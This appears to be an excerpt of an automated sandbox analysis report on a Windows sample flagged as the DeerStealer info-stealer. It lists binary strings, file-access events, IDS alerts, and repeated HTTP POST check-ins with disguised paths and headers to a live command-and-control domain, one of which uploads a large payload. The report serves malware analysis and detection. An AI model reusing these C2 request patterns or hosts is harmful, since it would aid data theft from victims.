00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdb source: Localdockerv3.exe, 00000008.00000002.2164083320.0000000004716000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168990180.0000000006F13000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2167276865.0000000005F15000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2164818824.0000000004D1A000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2167476156.000000000611F000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2163833523.0000000004517000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168743092.0000000006D14000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2165292012.0000000005116000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2165803793.000000000551C000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2166502980.0000000005912000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168051496.0000000006719000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2162708356.0000000003D1F000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2169225892.0000000007118000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdbt| source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979646405.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdbaK source: Localdockerv3.exe, 00000008.00000003.1989221143.0000000000AF1000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: FC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\al\Temp source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974363760.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: dC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\al State source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: eC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ticsnp3} source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: m\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State>pC}d source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: YC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdb981804 source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1981844538.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979646405.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ]\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: a\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040301A
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402B79
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2056550 - Severity 1 - ET MALWARE Win32/DeerStealer CnC Checkin : 192.168.2.8:49711 -> 172.67.153.243:443
                  Source: Network trafficSuricata IDS: 2056550 - Severity 1 - ET MALWARE Win32/DeerStealer CnC Checkin : 192.168.2.8:49723 -> 172.67.153.243:443
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49716 -> 172.67.153.243:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 172.67.153.243:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49721 -> 172.67.153.243:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49722 -> 172.67.153.243:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49720 -> 172.67.153.243:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49718 -> 172.67.153.243:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 172.67.153.243:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49717 -> 172.67.153.243:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49719 -> 172.67.153.243:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49723 -> 172.67.153.243:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 172.67.153.243:443
                  Source: global trafficHTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Content-Length: 96Host: digoperonodice3.online
                  Source: global trafficHTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1EContent-Length: 53Host: digoperonodice3.online
                  Source: global trafficHTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1EContent-Length: 208Host: digoperonodice3.online
                  Source: global trafficHTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1EContent-Length: 681886Host: digoperonodice3.online
                  Source: global trafficHTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1EContent-Length: 745Host: digoperonodice3.online
                  Source: global trafficHTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1EContent-Length: 212Host: digoperonodice3.online
                  Source: global trafficHTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1EContent-Length: 380Host: digoperonodice3.online
                  Source: global trafficHTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1EContent-Length: 35Host: digoperonodice3.online
                  Source: global trafficHTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1EContent-Length: 75155Host: digoperonodice3.online
                  Source: global trafficHTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1EContent-Length: 35Host: digoperonodice3.online
                  Source: global trafficHTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Content-Length: 96Host: digoperonodice3.online
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: digoperonodice3.online
                  Source: unknownHTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Content-Length: 96Host: digoperonodice3.online
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
